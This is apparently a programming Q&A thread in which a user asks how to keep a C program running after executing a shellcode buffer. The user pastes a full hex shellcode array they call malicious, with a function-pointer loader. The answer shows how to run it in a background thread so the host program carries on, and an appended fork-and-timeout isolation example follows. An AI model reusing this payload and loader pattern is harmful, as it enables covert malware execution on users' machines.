C program hangs / suspends while executing shellcode


#include <stdio.h>
char shellcode[] = "some shellcode here";
int main (int argc, char **argv) {
    void (*sptr)();
    sptr = (void(*)()) (&shellcode);
    sptr();
    printf("must display this");
    return 0;
}

While running the program, it executes sptr() and hangs there, probably because the shellcode is running in memory. printf("..") is never executed. My problem is that I want the program to execute printf().

Please help :)

Reply to Eric Finn and Alvin Wong

I changed it as both of you instructed, and the error I got is:

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

X:>"my program.exe"
'»".¼' is not recognized as an internal or external command,
operable program or batch file.
must display this

char shellcode[] is valid. I have compiled it successfully before.

Below is the original code with malicious shellcode, so your antivirus should detect it, just to verify to you guys that the shellcode is not the problem:

#include <stdio.h>
#include <stdlib.h>

char shellcode[] = "\xda\xd3\xd9\x74\x24\xf4\xbd\xe9\x6d\xf8\x29\x58\x33\xc9\xb1"
"\x58\x31\x68\x18\x83\xe8\xfc\x03\x68\xfd\x8f\x0d\xd5\x15\xc6"
"\xee\x26\xe5\xb9\x67\xc3\xd4\xeb\x1c\x87\x44\x3c\x56\xc5\x64"
"\xb7\x3a\xfe\xff\xb5\x92\xf1\x48\x73\xc5\x3c\x49\xb5\xc9\x93"
"\x89\xd7\xb5\xe9\xdd\x37\x87\x21\x10\x39\xc0\x5c\xda\x6b\x99"
"\x2b\x48\x9c\xae\x6e\x50\x9d\x60\xe5\xe8\xe5\x05\x3a\x9c\x5f"
"\x07\x6b\x0c\xeb\x4f\x93\x27\xb3\x6f\xa2\xe4\xa7\x4c\xed\x81"
"\x1c\x26\xec\x43\x6d\xc7\xde\xab\x22\xf6\xee\x26\x3a\x3e\xc8"
"\xd8\x49\x34\x2a\x65\x4a\x8f\x50\xb1\xdf\x12\xf2\x32\x47\xf7"
"\x02\x97\x1e\x7c\x08\x5c\x54\xda\x0d\x63\xb9\x50\x29\xe8\x3c"
"\xb7\xbb\xaa\x1a\x13\xe7\x69\x02\x02\x4d\xdc\x3b\x54\x29\x81"
"\x99\x1e\xd8\xd6\x98\x7c\xb5\x46\xc0\x0a\x45\xfe\x7d\x9a\x2b"
"\x97\xd5\x34\xf8\x10\xf0\xc3\xff\x0b\xcd\x34\xa8\xe4\x79\x9c"
"\x3d\x0a\xd2\x4a\xf8\x5c\xa3\x2d\x03\xb5\xb8\x79\xa7\x04\xf6"
"\x2f\x06\x0c\x0b\x81\xf9\xb8\x5b\x21\xfa\x38\x0f\x71\x92\x6f"
"\x26\xee\xa4\x70\xed\xfa\x1d\xd7\x3f\x2f\x0f\x8f\x3f\xcd\x90"
"\xcb\x12\x83\x82\x82\xc0\x73\x4b\xcf\xb0\x5d\xb0\xf0\xee\x2b"
"\x00\x64\x01\x77\xbc\x87\x76\xd0\xe9\x20\x2f\xb6\x38\xc8\xd7"
"\x3d\xbc\x01\x62\x01\x37\xb3\x26\xf6\xa8\x28\x51\x1d\x81\x46"
"\x65\x1d\xed\x69\x45\x98\x22\xf8\xdf\x5c\x43\x6a\x10\xe9\xe1"
"\x3c\x2f\xc7\x8c\x80\xa7\xe8\x40\x00\x38\x81\x60\x00\x78\x51"
"\x36\x68\x20\xf5\xeb\x8d\x2f\x20\x98\x1e\x83\x42\x78\xf7\x4b"
"\x55\xa7\xf7\x8b\x06\xf1\x9f\x99\x3e\x74\xbd\x61\xeb\x02\x81"
"\xea\xd9\x86\x06\x12\x21\x1d\xc8\x61\x40\x46\x0b\x61\xef\x88"
"\x74\x8d\x9d\x1f\xe9\x00\x31\x93\x82\x82\xb9\x7d\x3f\x24\x2f"
"\x82";

int main (int argc, char **argv) {
    void (*sptr)();
    sptr = (void(*)()) (&shellcode);
    sptr();
    printf("must display this"); // instead of more lines i put this one
    return 0;
}

The above code compiles successfully and runs perfectly.

I changed some lines to system(shellcode). It compiles but doesn't run properly.


Solution

  • As I understand it, you want to run some "machine code" (not shellcode), and no matter how the code runs, the program should continue.

    This is possible by using threading.

    First add these includes:

    #include <windows.h>
    #include <process.h>
    

    And in your code:

    void (*sptr)(void*);                  // Type for `_beginthread`
    sptr = (void(*)(void*)) (&shellcode); // PLEASE rename to `machinecode`
    _beginthread(sptr,0,NULL);            // This starts your code in a new thread
    Sleep(5000);                          // Wait for 5000 ms
    printf("must display this");
    

    Of course this is not a proper way to multi-thread a program, but since your code is "machine code" there's not much to be done.

    P.S. When I try your code it finally reaches an "Access violation" (segmentation fault) (and it shows the "x.exe encountered a problem" dialog), and my antivirus didn't detect anything (do I need to switch to another one??), so you may need to review the code or add an exception handler...
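
The thread in the answer lets `main` continue past code that never returns, but a thread shares the process, so an access violation like the one in the P.S. still ends the whole program. As an added example (not from the original posts, and POSIX C rather than the Windows API used above), this runs a routine in a child process with a time limit so the caller continues whether the routine returns, hangs or crashes; `run_isolated` and the three sample routines are constructed for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

enum outcome { RAN_OK, CRASHED, TIMED_OUT, SPAWN_FAILED };

/* Constructed stand-ins for "code we do not trust to return". */
static void returns_normally(void) { }
static void never_returns(void)    { for (;;) pause(); }
static void crashes(void)          { abort(); }  /* dies on a signal, like a fault */

/* Run fn in a child process; give it timeout_ms, then kill it. */
enum outcome run_isolated(void (*fn)(void), int timeout_ms)
{
    fflush(NULL);                  /* keep buffered output out of the child */
    pid_t pid = fork();
    if (pid < 0) return SPAWN_FAILED;
    if (pid == 0) {                /* child: only this process can hang or crash */
        fn();
        _exit(0);
    }
    const struct timespec tick = { 0, 10 * 1000 * 1000 };   /* 10 ms */
    int status;
    for (int waited = 0; waited < timeout_ms; waited += 10) {
        pid_t r = waitpid(pid, &status, WNOHANG);
        if (r == pid)
            return WIFSIGNALED(status) ? CRASHED : RAN_OK;
        if (r < 0) return SPAWN_FAILED;
        nanosleep(&tick, NULL);
    }
    kill(pid, SIGKILL);            /* still running: stop it and reap it */
    waitpid(pid, &status, 0);
    return TIMED_OUT;
}

int main(void)
{
    static const char *name[] = { "ran ok", "crashed", "timed out", "spawn failed" };
    printf("returns_normally: %s\n", name[run_isolated(returns_normally, 500)]);
    printf("never_returns:    %s\n", name[run_isolated(never_returns, 200)]);
    printf("crashes:          %s\n", name[run_isolated(crashes, 500)]);
    printf("must display this\n");
    return 0;
}
```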